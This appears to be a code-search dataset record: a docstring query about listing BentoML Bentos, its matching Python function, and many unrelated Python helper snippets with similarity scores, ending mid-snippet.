"def print_class_dict_rough(self):\n for tag in self.post_div.find_all(\"b\"):\n if tag.next_sibling is not None and tag.next_sibling.name == \"br\":\n text = str(tag.text).lower()\n while \" \" in text:\n text = text.replace(\" \", \"-\")\n i = 0\n while i < len(text):\n if not text[i].isalpha() and text[i] != \"-\":\n text = text[:i] + text[i + 1:]\n else:\n i += 1\n if len(text) > 0:\n if tag.find_next(\"a\") is not None:\n link = tag.find_next(\"a\")[\"href\"]\n else:\n link = \"\"\n print(\"\\\"\" + text + \"\\\":\\\"\" + link + \"\\\",\")",
"def pretty_print_item(item):\n title = item.title\n body = item.summary\n timestamp = item.published\n if not ARGV.get(RAW_OPT):\n #if not using raw also bold title\n title = BOLD + title + CLEAR\n h2t = html2text.HTML2Text()\n h2t.inline_links = False\n h2t.body_width = 85\n body = h2t.handle(body)\n print(title + '\\n' + timestamp + '\\n\\n' + body)",
"def print(self):\n print('Name:', self.name)\n print('Camera:', self.camera)\n print('Memory:', self.memory)\n print('Ram:', self.ram)\n print('Price:', self.price)\n print('Image:', self.image)",
"def _print(self, text):\n\t\tif self.verbose:\n\t\t\tprint text",
"def __str__(self):\n out = str(self.tag_pairs)\n if self.comment:\n out += \"{\" + self.comment + \"} \"\n out += self.format_body()\n return out",
"def printname(bruce):",
"def print_debug(context: str = \"\") -> None:\r\n print(context)\r\n print(\"This is the current board\")\r\n print(example)\r\n print(\"This is the conflict space\")\r\n print(conflict_space)\r\n print(\"This is the safeboard\")\r\n print(safeboard)",
"def pprint(obj):\n for argname in sorted([x for x in dir(obj) if not x.startswith('__')]):\n # Skip callables\n if hasattr(getattr(obj, argname), '__call__'):\n continue\n print(\"{} : {}\".format(argname, getattr(obj, argname)))",
"def print_details(self):\n self.view.print_details()",
"def __str__(self):\n # only print the words, dont want to print the embeddings too\n return \"Stack: {}\\nInput Buffer: {}\\n\".format([ entry.headword for entry in self.stack ], \n [ entry.headword for entry in self.input_buffer[self.curr_input_buff_idx:] ])",
"def print_order_tags(self, print_order_tags):\n\n self._print_order_tags = print_order_tags",
"def print_business(business_object):\n # OLD ----------\n # print('Business name: ' + business_object['name'])\n # print('Address: ' + business_object['address'])\n # print('City: ' + business_object['city'])\n # print('State: ' + business_object['state'])\n # print('Average Ratings: ' + str(business_object['stars']) +\n # ' Review Count: ' + str(business_object['review_count']))\n # print('categories: ' + str(business_object['categories']))\n\n print(business_object['name'])\n print(f'Address: {business_object[\"address\"]}, '\n f'{business_object[\"city\"]}, {business_object[\"state\"]}')\n print('#############################')",
"def print_tags(self, filename):\n fh = open(filename, 'w')\n for t in self.source_tags.tags:\n fh.write(\"%d\\t%d\\t%s\" % (t.begin, t.end, t.name))\n for (attr, val) in t.attrs.items():\n fh.write(\"\\t%s=\\\"%s\\\"\" % (attr, val.replace('\"','"')))\n fh.write(\"\\n\")",
"def print(self):\n print(self.pretty_str())",
"def _repr_pretty_(self, p, cycle):\n self.__verify_repo_initialized()\n res = f'Hangar {self.__class__.__name__}\\\n \\n Repository Path : {self.path}\\\n \\n Writer-Lock Free : {heads.writer_lock_held(self._env.branchenv)}\\n'\n p.text(res)",
"def help_dump(self):\n print(DUMP)",
"def print_vscsi_attributes(self,objects):\n print(\"\\n\")\n print((\"LocalPartitionID\".ljust(35),\":\",objects.LocalPartitionID.value()))\n print((\"VirtualSlotNumber\".ljust(35),\":\",objects.VirtualSlotNumber.value()))\n print((\"RequiredAdapter\".ljust(35),\":\",objects.RequiredAdapter.value()))\n print((\"RemoteLogicalPartitionID\".ljust(35),\":\",objects.RemoteLogicalPartitionID.value()))\n print((\"RemoteSlotNumber\".ljust(35),\":\",objects.RemoteSlotNumber.value()))",
"def pprint(self):\n # just here for defining the interface; work is done in subclasses\n pass",
"def print_agent(agent):\n agent_string = \"FOUND:\\n\"\n for key in place_detail_keys:\n agent_string += \"\\t%s: %s\\n\" % (key, agent[key])\n log.debug(agent_string)",
"def displayhook(p_object): # real signature unknown; restored from __doc__\n pass",
"def print(self):\n # Your implementation here",
"def print_pos(self, byte_offset=-1):\n if self._debug_level > 3:\n if hasattr(self, 'ensemble'):\n k = self.ensemble.k\n else:\n k = 0\n print(' pos: %d, pos_: %d, nbyte: %d, k: %d, byte_offset: %d' %\n (self.f.tell(), self._pos, self._nbyte, k, byte_offset))",
"def bpprint(self, out=None):\n if out is None:\n out = sys.stdout\n print(self.bpformat(), file=out)",
"def describe_pet(animal, name):\r\n print(\"\\nI have a \" + animal + \".\")\r\n print(\"Its name is \" + name + \".\")",
"def hinfo(*objects, file=sys.stderr, flush=True, style=Fore.CYAN, **kwargs):\r\n with ScopedColoredStream(file, style, flush_on_exit=flush) as stream:\r\n print(*objects, file=stream, flush=False, **kwargs)",
"def print_tags(self):\n tags = [tag.name for tag in self.tags.all().order_by('name')]\n return \", \".join(tags) if tags else \"\"",
"def printt(content, flag=False):\n if flag:\n print(content)",
"def print_state(self):\n print(self.identifier, \n self.gender, \n self.age,\n self.sexual_activity,\n self.disease_status,\n self.time_since_infection,\n self.number_of_partners,\n self.current_partners)",
"def print_item(group):\n print(\"\\tName: {}\".format(group.name))\n print(\"\\tId: {}\".format(group.id))\n if hasattr(group, 'location'):\n print(\"\\tLocation: {}\".format(group.location))\n print_properties(getattr(group, 'properties', None))"
] | [
"0.59889174",
"0.5728905",
"0.56706613",
"0.56307644",
"0.5569425",
"0.5474408",
"0.5425949",
"0.54244584",
"0.5415978",
"0.5385348",
"0.53358155",
"0.5326319",
"0.5322443",
"0.5317626",
"0.5277394",
"0.52764267",
"0.5227435",
"0.5224774",
"0.5220987",
"0.5199572",
"0.5164107",
"0.5150359",
"0.514877",
"0.51372164",
"0.5133556",
"0.5131356",
"0.51305985",
"0.51263386",
"0.51262504",
"0.5125374",
"0.512511",
"0.51232696",
"0.5118873",
"0.51166296",
"0.51134217",
"0.5112508",
"0.5097552",
"0.5094875",
"0.50929403",
"0.5081634",
"0.5063973",
"0.5057993",
"0.5056457",
"0.5056457",
"0.50551665",
"0.5043804",
"0.5021302",
"0.50163233",
"0.50044125",
"0.49964106",
"0.49920362",
"0.49877962",
"0.49771473",
"0.49755406",
"0.4974986",
"0.49638215",
"0.49555904",
"0.49555904",
"0.49509498",
"0.4950834",
"0.4949914",
"0.49467248",
"0.4942187",
"0.49331284",
"0.49315047",
"0.49297842",
"0.49272087",
"0.49248806",
"0.49208713",
"0.4920582",
"0.49134144",
"0.49089247",
"0.49079606",
"0.49066326",
"0.49057236",
"0.4899713",
"0.48994008",
"0.4896269",
"0.4895942",
"0.48900846",
"0.48884305",
"0.48873472",
"0.48848",
"0.48842898",
"0.4881558",
"0.48811167",
"0.48771212",
"0.4873694",
"0.48683414",
"0.48676652",
"0.48642212",
"0.48616594",
"0.48564544",
"0.48415488",
"0.4836313",
"0.4835329",
"0.48289087",
"0.48259103",
"0.48219702",
"0.48146647"
] | 0.637782 | 0 |
List Bentos in local store \b show all bentos saved $ bentoml list \b show all verions of bento with the name FraudDetector $ bentoml list FraudDetector | def list_bentos(bento_name: str, output: str) -> None: # type: ignore (not accessed)
bentos = bento_store.list(bento_name)
res = [
{
"tag": str(bento.tag),
"path": display_path_under_home(bento.path),
"size": human_readable_size(calc_dir_size(bento.path)),
"creation_time": bento.info.creation_time.astimezone().strftime(
"%Y-%m-%d %H:%M:%S"
),
}
for bento in sorted(
bentos, key=lambda x: x.info.creation_time, reverse=True
)
]
if output == "json":
info = json.dumps(res, indent=2)
console.print(info)
elif output == "yaml":
info = yaml.safe_dump(res, indent=2)
console.print(Syntax(info, "yaml"))
else:
table = Table(box=None)
table.add_column("Tag")
table.add_column("Size")
table.add_column("Creation Time")
table.add_column("Path")
for bento in res:
table.add_row(
bento["tag"],
bento["size"],
bento["creation_time"],
bento["path"],
)
console.print(table) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def command_list(arguments):\n global current_mode\n current_mode = Mode.list\n #current_entity.addlink(arguments[0], arguments[1])\n return 'Now listing all entities'",
"def list_cmd(ctx):\n client = ctx.obj['CLIENT']\n models = client.list_models()\n\n x = PrettyTable()\n x.field_names = [\"Name\",\"Tag\",\"Created\"]\n for m in models:\n x.add_row([m[\"name\"],m[\"tag\"],m[\"uploaded_at\"]])\n print(x)",
"def _list():\n db = shelve.open(\"db\", flag='c', protocol=None, writeback=False)\n names_only = input(\"Names only [Y/n] ->\")\n\n if names_only == \"Y\":\n for name in db.keys():\n print(name)\n elif names_only == \"n\":\n for key in db.items():\n print(key, sep=' ', end='\\n', file=sys.stdout, flush=False)\n #print((\";\\n\".join(\"%s=>%s\" % i for i in db.items())))",
"def db_show_all():\n the_list = []\n db = sh.open(the_phone_book_name, flag='c', writeback=True)\n for key in db:\n person = Person()\n person.name = key\n person.phone = db[key]\n the_list.append(person)\n display_list(the_list)\n db.close()",
"def list(default_view):\n ListCommandExecutor(default_view).list()",
"def view_all(entities, table, db):\n print \n print \"TABLE:\",table\n for ii in entities:\n print ii\n print",
"def view_command():\n listing.delete(0, END)\n for row in backend.view():\n listing.insert(END, row)",
"def list(self, subcmd):\n\n self.__connect_db()\n tariffs = []\n\n for tariff in self.db.get_tariffs():\n tariffs.append(tariff.name)\n print(tariff.name)\n\n #print(\"\\n\".join(sorted(tariffs)))",
"def list():\n rino.remote.list()",
"def list():",
"def list():",
"async def get_pretty_vetoes(self) -> typing.List[str]:\n\n open_bills = await self.bot.db.fetch(\n \"SELECT id, name, link, link FROM bill WHERE is_vetoable = true AND status = $1 ORDER BY id\",\n models.BillPassedLegislature.flag.value,\n )\n\n if not open_bills:\n return []\n\n pretty_bills = []\n b_ids = []\n b_hyperlinks = []\n\n for record in open_bills:\n b_ids.append(f\"Bill #{record['id']}\")\n b_hyperlinks.append(\n f\"=HYPERLINK(\\\"{record['link']}\\\"; \\\"{record['name']}\\\")\"\n )\n pretty_bills.append(\n f\"Bill #{record['id']} - [{record['name']}]({record['link']})\"\n )\n\n exported = [\n f\"Export of Veto-able Bills -- {discord.utils.utcnow().strftime('%c')}\\n\\n\\n\",\n \"----- Veto-able Bills -----\\n\",\n ]\n\n exported.extend(b_ids)\n exported.append(\"\\n\")\n exported.extend(b_hyperlinks)\n\n link = await self.bot.make_paste(\"\\n\".join(exported))\n\n if link:\n pretty_bills.insert(\n 0,\n f\"[*View this list in Google Spreadsheets formatting for easy copy & pasting*]({link})\\n\",\n )\n\n return pretty_bills",
"async def __list(self, ctx):\n server = ctx.message.server\n if server.id not in self.db:\n self.db[server.id] = {}\n self.save_db()\n else:\n db = self.db[server.id]\n if \"bookkeeper\" not in self.db[server.id]:\n self.db[server.id][\"bookkeeper\"] = []\n self.save_db()\n await self.bot.say(\"Bookkeeper list is currently empty, add new bookkeepers using points keeper add\"\n \" <Discord name or nickname>\")\n return\n else:\n bookkeeper = db[\"bookkeeper\"][:]\n msg = \"\"\n for x in bookkeeper:\n bookkeeper[bookkeeper.index(x)] = discord.utils.find(lambda N: N.id == x, server.members).display_name\n bookkeeper = sorted(bookkeeper, key=lambda item: (int(item.partition(' ')[0])\n if item[0].isdigit() else float('inf'), item))\n msg = \", \".join(bookkeeper[:-2] + [\" and \".join(bookkeeper[-2:])])\n await self.bot.say(\"Current bookkeepers assigned are: {}\".format(msg))",
"async def list(self, ctx: MyContext):\n if ctx.subcommand_passed is None:\n await ctx.send_help(\"wormhole list\")",
"def do_bay_list(cs, args):\n bays = cs.bays.list(marker=args.marker, limit=args.limit,\n sort_key=args.sort_key,\n sort_dir=args.sort_dir)\n columns = ['uuid', 'name', 'node_count', 'master_count', 'status']\n columns += utils._get_list_table_columns_and_formatters(\n args.fields, bays,\n exclude_fields=(c.lower() for c in columns))[0]\n utils.print_list(bays, columns,\n {'versions': magnum_utils.print_list_field('versions')},\n sortby_index=None)",
"def ls(filter=None):",
"async def list(self, ctx):\n server = ctx.message.server\n if server.id not in self.db:\n self.db[server.id] = {}\n dataIO.save_json(\"data/lootbox/servers.json\", self.db)\n if len(self.db[server.id]) < 1:\n await self.bot.say(\"No boxes have been created for this server yet, please create some using [p]box create\"\n \" first, thanks\")\n return\n boxes = self.db[server.id].keys()\n await self.bot.say(\"Here are this server's boxes:\\n{}\".format(\"\\n\".join(boxes)))",
"def list_litnacionals_cmd():\n return ListLitnacionalCommand()",
"def listaSangre():\n san = SangreModel()\n\n return san.listarTodos()",
"def list_command(ctx: Any) -> None:\n pass",
"def view(args):\n print(\"List of all available phonebooks:\")\n for file in glob.glob(\"*.ph\"):\n print(file)",
"def do_all(self, line=None):\n\n if not line or line in HBNBCommand.class_list:\n dict_objects = storage.all()\n list_objects = []\n for key, obj in dict_objects.items():\n list_objects.append(obj.__str__())\n print(list_objects)\n else:\n print(\"** class doesn't exist **\")",
"def list_(ctx: click.Context, repository_path):\n root_commands.cmd_list(ctx.obj, repository_path)",
"async def blocklist(self, ctx):\n blocked = await self.db.get('blocked', [])\n if not blocked:\n return await ctx.send('🐱 There are no blocked images.')\n async with aiohttp.ClientSession() as session:\n async with session.post(f'{self.haste_url}/documents', data='\\n'.join(blocked)) as resp:\n return await ctx.send(f'🐱 Here is a list of blocked images\\n\\n{self.haste_url}/{resp[\"key\"]}.txt')",
"def do_command(self, args):\n vendorops = dbops.Vendors()\n listing = vendorops.list(args)\n ordering = ['vendor_name']\n do_list(listing, ordering)",
"def do_list(args):\n session = BMC(server=args.server, username=args.username, password=args.password)\n for i in session.list(args.path):\n print(i)",
"def view_all_batters(self):\n conn = rs.create_connection(\"dailyfantasyscraper.db\")\n cur = conn.cursor()\n position = \"P\"\n cur.execute(\"SELECT * FROM rotowiredk where position != ?\", position)\n result = cur.fetchall()\n conn.commit()\n conn.close()\n\n for item in result:\n print(item)\n tree.insert('', 'end', values=item)",
"def show():\n logger.info('List donors')\n try:\n logger.info('Connecting to database...')\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n for i in Donor.select().order_by(Donor.donor_name):\n print(i)\n except Exception as e:\n logger.info(e)\n finally:\n database.close()",
"def command_ls(self, list_what):\n if list_what in ('available', 'mounted', 'unmounted'):\n callback = getattr(self.environment, 'get_%s_ids' % list_what)\n lst = callback()\n else:\n lst = []\n if len(lst) != 0:\n print((\"\\n\".join(lst)))",
"def list(self):",
"async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"",
"def list_command(*, login_manager: LoginManager):\n search_client = login_manager.get_search_client()\n formatted_print(\n search_client.get(\"/v1/index_list\"),\n fields=INDEX_LIST_FIELDS,\n text_format=FORMAT_TEXT_TABLE,\n response_key=\"index_list\",\n )",
"def list(\n self,\n name,\n ):\n pass",
"def printdonorlist():\n for name in donor_db:\n print(name)",
"def do_list_availble_books(self, line):\n\t\tprint('\\nBooks in your current directory: \\n')\n\t\tfor i in os.listdir():\n\t\t\tif i.endswith('.bin'):\n\t\t\t\tprint(i)\n\t\tprint('\\n')",
"def do_list(self, line):\n\t\tx = [i for i in self.client.list_databases() if i['name'] not in ['admin','config','line','local','mongoengine_test','pymongo_test']]\n\t\tfor db in x:\n\t\t\tprint(db['name'])",
"def list(self):\n return {'klanten': self.request.db.query(models.Klant).all()}",
"def cmd_list(self):\n rc = self.socket_command('list', False)\n return rc",
"def main(appinfo, args):\n parser = optparse.OptionParser(\n usage='%prog list [OPTS] [--] [SEARCH..]',\n )\n parser.add_option(\n '-v', '--verbose',\n help='show more information',\n action='count',\n )\n parser.add_option(\n '--tag',\n help='only list tickets having this tag',\n action='append',\n )\n parser.add_option(\n '--order',\n help='sort listing according to criteria',\n )\n parser.add_option(\n '--hide',\n metavar='FIELD',\n help='hide field from listing',\n )\n parser.add_option(\n '--show',\n metavar='FIELD',\n help='show field in listing',\n )\n (options, args) = parser.parse_args(args)\n\n if args:\n raise NotImplementedError(\n 'TODO Full text search not supported yet.')\n\n def list_tickets():\n for (mode, type_, object, basename) in storage.git_ls_tree(\n path='',\n children=True,\n ):\n yield basename\n\n for ticket in list_tickets():\n number = storage.get(os.path.join(ticket, 'number'))\n if number is not None:\n number = number.rstrip()\n ident = '#%s' % number\n else:\n ident = ticket[:7]\n description = storage.get(os.path.join(ticket, 'description')).rstrip()\n tags = set(storage.ls(os.path.join(ticket, 'tags')))\n if options.tag:\n must = frozenset(options.tag)\n if not tags & must:\n continue\n tags = tagsort.human_friendly_tagsort(tags)\n if options.verbose:\n raise NotImplementedError\n if options.order:\n raise NotImplementedError\n if options.show:\n raise NotImplementedError\n if options.hide:\n raise NotImplementedError\n (title, description) = util.extract_title(description)\n print '%(ident)s\\t%(title)s' % dict(\n ident=ident,\n title=title,\n )\n if tags:\n print textwrap.fill(\n ' '.join(tags),\n initial_indent=' ',\n subsequent_indent=' ',\n break_long_words=False,\n )",
"def show_list():\n\n response = []\n docs = SUPERHEROES.stream()\n for doc in docs:\n response.append(doc.to_dict())\n return jsonify(response), 201",
"async def bot_list(self) -> list:\n return await self._do_request(\"get\", botlist_address, self._user_auth)",
"def list_(args):\n osf = _setup_osf(args)\n\n project = osf.project(args.project)\n\n for store in project.storages:\n prefix = store.name\n for file_ in store.files:\n path = file_.path\n if path.startswith('/'):\n path = path[1:]\n\n print(os.path.join(prefix, path))",
"def bmark_list(request):\r\n # Removed because view was deprecated\r\n return bmarks.recent(request)",
"def list():\n\n click.secho('List of libraries in SJSU-Dev2\\n', fg='white', bold=True)\n package_registry = GetListOfSJSUDev2Repos()\n library_list = [f'{x : <20}: {package_registry[x]}'\n for x in package_registry if x.startswith('lib')]\n print('\\n'.join(library_list))",
"def bentity_list(request, format='csv'):\n \n \n bentities = Bentity.objects.all().order_by('bentity')\n \n \n if format == 'csv':\n # Serislize CSV for API\n return CSVResponse(\n [{'bentity_id': b.gid, 'bentity_name': b.bentity} for b in bentities],\n ('bentity_id', 'bentity_name') )\n \n else:\n # Serialize JSON for bentity-list widget\n json_objects = [{\n 'key': b.gid,\n 'display': b.bentity,\n } for b in bentities]\n \n return JSONResponse({'bentities' : json_objects})",
"def lista_ventas(self,tipo,lista,filtro):\n self.lista=self.builder.get_object(lista)\n self.lista.clear()#Limpia la lista\n busqueda = \"\"\n\n if tipo==\"\":\n print(\"Llego a buscar ventas en BD\")\n #result=self.db.execute('SELECT * FROM Venta')\n busqueda = self.db.execute('SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID')\n elif tipo == \"Cliente\":\n print(\"Busco venta por nombre del cliente\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND C.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Viaje\":\n print(\"Busco venta por nombre del paquete\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND P.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de inicio\":\n print(\"Busco venta por fecha de inicio\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaInicio LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de fin\":\n print(\"Busco venta por fecha de fin\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaFin LIKE '%\"+filtro+\"%'\")\n \n for row in busqueda: \n #Empieza por la [1] porque el ID es la [0]\n # self.lista.append([row[4],row[5],row[1],row[2],row[3]])\n self.lista.append([row[1],row[2],row[3],row[4],row[5],row[0]])\n print(\"Listo ventas en tabla\")",
"def show(args, syn):\n \n ent = syn.get(args.id, downloadFile=False)\n syn.printEntity(ent)",
"def do_all(self, line):\n list_line = line.split(' ')\n string = \"\"\n list_all = []\n if line == \"\":\n for key, value in models.storage.all().items():\n string = str(value)\n list_all.append(string)\n print(list_all)\n elif list_line[0] not in HBNBCommand.classes.keys():\n print(\"** class doesn't exist **\")\n else:\n for key, value in models.storage.all().items():\n if value.__class__.__name__ == list_line[0]:\n string = str(value)\n list_all.append(string)\n print(list_all)",
"def list_branches():\n a = App()\n print(tabulate(a.list_branches(), tablefmt=\"fancy_grid\"))",
"def browse_mentors(request):\n all_mentors = Mentor.objects.all()\n mentors = [mentor for mentor in all_mentors if mentor.mentor.has_capacity()]\n return render(request, 'match/browse_mentors.html', {'mentors': mentors})",
"def showTables():\n global cursor\n #cursor.execute('SELECT * FROM *')\n cursor.execute('''SELECT * FROM sqlite_master WHERE type='table' ''')\n\n tables = cursor.fetchall()\n print \"Tables available are:\"\n print tables[0]",
"def do_list(self, args):\n if args.option == 'config':\n print(list_config())\n if args.option == 'queries':\n for k,v in list_queries().items():\n print(k, \":\", json.dumps(v, indent=4))\n if args.option == 'jobs':\n update_jobs(CLI_GLOBALS.ENGAGEMENT)\n for k,v in list_jobs().items():\n print(k, \":\", json.dumps(v, indent=4))\n if args.option == 'results':\n for i in list_results():\n print(i)\n if args.option == 'key':\n for k,v in list_key().items():\n print(k, \":\", json.dumps(v, indent=4))\n if args.option == 'engagement':\n print(list_engagement())",
"def ls():",
"def book_list(request):\n\tbooks = Book.objects.all()\n\tif not books:\n\t\tmessages.info(request, \"There is no book registered in the current system\")\n\treturn render(request, 'BookManagement/book_list.html', {'books': books})",
"def list(request):\n files = PoFile.objects.all()\n return render_to_response('poeditor/list.html', {\n 'files' : files,\n }, context_instance=RequestContext(request))",
"def vbd_list(name=None, call=None):\n if call == \"function\":\n raise SaltCloudSystemExit(\n \"This function must be called with -a, --action argument.\"\n )\n if name is None:\n return \"A name kwarg is rquired\"\n ret = {}\n data = {}\n session = _get_session()\n vms = session.xenapi.VM.get_by_name_label(name)\n if len(vms) == 1:\n vm = vms[0]\n vbds = session.xenapi.VM.get_VBDs(vm)\n if vbds is not None:\n x = 0\n for vbd in vbds:\n vbd_record = session.xenapi.VBD.get_record(vbd)\n data[\"vbd-{}\".format(x)] = vbd_record\n x += 1\n ret = data\n return ret",
"def do_ls(self, arg):\n\t\topts = get_options(parser.parser_ls, arg)\n\t\tif opts is None: return\n\t\tweight = opts.weight\n\t\tdisplay.print_bets(self.manager.bets, weight = weight,\n\t\t\t\tdisplay_resolved = opts.display_resolved,\n\t \t\t\tdisplay_open = opts.display_open,\n\t\t\t\tlimit = opts.limit)",
"def list(self, arguments):\n\n print(\"{}\\t{}\".format(\n 'BOX'.rjust(35),\n 'VERSION'.rjust(12),\n ))\n path = os.path.abspath(os.path.join(HOME, 'boxes'))\n for root, dirnames, filenames in os.walk(path):\n for filename in fnmatch.filter(filenames, '*.box'):\n directory = os.path.dirname(os.path.join(root, filename))[len(path) + 1:]\n account, box, version = (directory.split(os.path.sep, 2) + ['', ''])[:3]\n print(\"{}\\t{}\".format(\n \"{}/{}\".format(account, box).rjust(35),\n version.rjust(12),\n ))",
"def List(cls):\n return WordList.query().fetch_async()",
"def list():\n rino.login.list()",
"def printall():\n print listAll()",
"async def list(self, ctx):\r\n try:\r\n if ctx.message.server.id not in self.adkillr:\r\n await self.bot.say(\"There are no filters set for this server.\")\r\n else:\r\n await self.bot.say(\"The current filters are\\n{}.\".format(\", \".join(self.adkillr[ctx.message.server.id]['filters'])))\r\n except KeyError:\r\n await self.bot.say(\"There are no filters set for this server.\")",
"def cafe_list():\n\n cafes = Cafe.query.order_by('name').all()\n\n return render_template(\n 'cafe/list.html',\n cafes=cafes,\n )",
"def getlist_command(chat, message, args):\n msg = \"\"\n get_last = os.popen(path_to_bin + \"/bitcanna-cli listtransactions\").read()\n loaded_json = json.loads(get_last)\n for tx in loaded_json:\n date_time = datetime.datetime.fromtimestamp(tx['blocktime']).strftime('%c')\n msg = msg + tx['category'] + \" BCNA: \" + str(tx['amount']) + \" at \" + date_time + \"\\n\"\n print (msg)\n chat.send(msg)",
"def list():\n index = config.index\n output_format = \"%-7s %-20s %s\"\n click.secho(output_format % (\"ID\", \"CREATED\", \"BACKENDS\"), fg=\"cyan\")\n for archive in sorted(index.archives(), key=lambda x: x[\"id\"]):\n # Print it out\n click.echo(\n output_format\n % (\n archive[\"id\"],\n datetime.datetime.fromtimestamp(archive[\"created\"]).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n ),\n \", \".join(sorted(archive[\"backend_names\"])),\n )\n )",
"def list_formacaos_cmd():\n return ListFormacaoCommand()",
"def display_book(self):\n print(\"List of books available is: \")\n for book in books_list :\n print(\"- \",book)",
"def cargar_bolsa(self,lista):\n self.bolsa = lista",
"def get_hold_lists():\n no_token = 'Y'\n list_of_books = overdrive_apis.get_hold_list(no_token)\n return render_template('hold_list.html', list_of_books=list_of_books, what='hold')",
"def comando_listagem(self):\r\n if not args.data and not args.nnf and not args.chave:\r\n parser.error(\"informe a opcao -d, -n ou -c para listagem de notas.\")\r\n\r\n\tif args.data:\r\n # Usuario nao autorizado\r\n self.busca_por_data(args.data[0], args.data[1])\r\n return\r\n\r\n if not args.serie:\r\n parser.error(\"informe a opcao -s para serie\")\r\n\r\n\tif args.nnf:\r\n if args.bloco: # processa as notas em bloco por causa de erros de\r\n\t\t # Segmentation fault\r\n listagem = self.busca_por_nnf_bloco(args.nnf[0], args.nnf[1], \r\n\t\t\t args.serie, args.bloco)\r\n # Criar formatacao para as outras buscas\r\n\t # Em caso de Exception: A listagem nao esta sendo atualizada.\r\n if args.irregular: # Inclui notas nao utilizadas\r\n # python /u1/caixa/nfce.py -p listagem -n 256 270 -s 80 -ib 1\r\n sequencia = [] # Lista contendo numeros de notas utilizadas\r\n for nota in listagem:\r\n sequencia.append(int(nota[\"docnumero\"]))\r\n serie = listagem[0][\"docserie\"] \r\n notas_nao_utilizadas = self.sequencia_nao_utilizada(serie, sequencia)\r\n for nota in notas_nao_utilizadas:\r\n listagem.append(nota) # Append das notas nao utilizadas\r\n \r\n #diretorio = None\r\n self.formata_listagem(listagem)\r\n else:\r\n self.busca_por_nnf(args.nnf[0], args.nnf[1], args.serie)\r\n return\r\n\r\n\tif args.chave:\r\n self.busca_por_chave(args.chave, args.serie)",
"def list():\n data = getInstaData()\n return render_template(\"list.html\", data=data)",
"def show_books():\n result = {'books': query.get_book_list()}\n return json.dumps(result, ensure_ascii=False)",
"def GET(self):\n listing = sandbox.list(sandbox_name)\n return render.index(listing=listing)",
"def list(self, start=0, end=10):\n print(\"GBTIDL> \")",
"def do_all(self, arg):\n objs = []\n arg = arg.split()\n if arg and arg[0] not in HBNBCommand.dict.keys():\n print(\"** class doesn't exist **\")\n return\n if len(arg) == 0:\n objs = [i.__str__() for i in storage.all().values()]\n else:\n for objects in storage.all().values():\n if arg[0] in objects.__class__.__name__:\n objs.append(objects.__str__())\n print(objs)",
"def do_all(self, arg):\n arg_list = arg.split(\" \") if type(arg) == str else arg\n if arg:\n if arg_list[0] not in HBNBCommand.class_list:\n print(\"** class doesn't exist **\")\n return\n obj_list = []\n for key, val in storage.all().items():\n if key.split(\".\")[0] == arg_list[0]:\n obj_list.append(str(val))\n print(obj_list)\n return\n obj_list = [str(val) for val in storage.all().values()]\n print(obj_list)",
"def list_books():\n view_book_tk = BooklistDialog()\n view_book_tk.create_components()\n view_book_tk.mainloop()",
"def list_tags():\r\n tags = Tag.query.order_by(Tag.name).all()\r\n return render_template('tags.html', tags=tags)",
"def print_list(self):\n self.print_avec_separateur(\" \")",
"def get_all_bank_names() -> List[str]:\n\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select name from bank\"\n cursor.execute(query)\n data = cursor.fetchall()\n r_list = [x[0] for x in data]\n db.disconnect()\n return r_list",
"def database_volume_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.Volume)\n\n volume_objs = list()\n for volume in query.all():\n nfvi_volume_data = json.loads(volume.nfvi_volume_data)\n nfvi_volume = nfvi.objects.v1.Volume(nfvi_volume_data['uuid'],\n nfvi_volume_data['name'],\n nfvi_volume_data['description'],\n nfvi_volume_data['avail_status'],\n nfvi_volume_data['action'],\n nfvi_volume_data['size_gb'],\n nfvi_volume_data['bootable'],\n nfvi_volume_data['encrypted'],\n nfvi_volume_data['image_uuid'])\n volume_obj = objects.Volume(nfvi_volume)\n volume_objs.append(volume_obj)\n return volume_objs",
"async def list(self, ctx, debug=\"0\"):\n if debug != \"0\" and debug != \"1\":\n debug = \"0\"\n\n with db_session:\n no_prefix_commands = select(c for c in CCCommands if c.type == 0 and c.guild_id == ctx.guild.id)[:]\n prefix_commands = select(c for c in CCCommands if c.type == 1 and c.guild_id == ctx.guild.id)[:]\n embed_commands = select(c for c in CCCommands if c.type == 2 and c.guild_id == ctx.guild.id)[:]\n\n def add_commands(commands, paginator):\n if not commands:\n paginator.add_line(\"There are no commands setup.\")\n else:\n for command in commands:\n output = command.name\n if debug == \"1\":\n output += \" = '{}'\".format(command.output if command.type == 2 else command.output[0])\n paginator.add_line(\"- \" + output)\n\n paginator = commands.Paginator(prefix=\"```md\")\n paginator.add_line(\"__Here is the list of Custom Commands...__\")\n paginator.add_line()\n\n paginator.add_line(\"__Prefix Commands (Non Embeds):__\")\n add_commands(prefix_commands, paginator)\n paginator.add_line()\n\n paginator.add_line(\"__Prefix Commands (Embeds):__\")\n add_commands(embed_commands, paginator)\n paginator.add_line()\n\n paginator.add_line(\"__Commands that don't require prefix:__\")\n 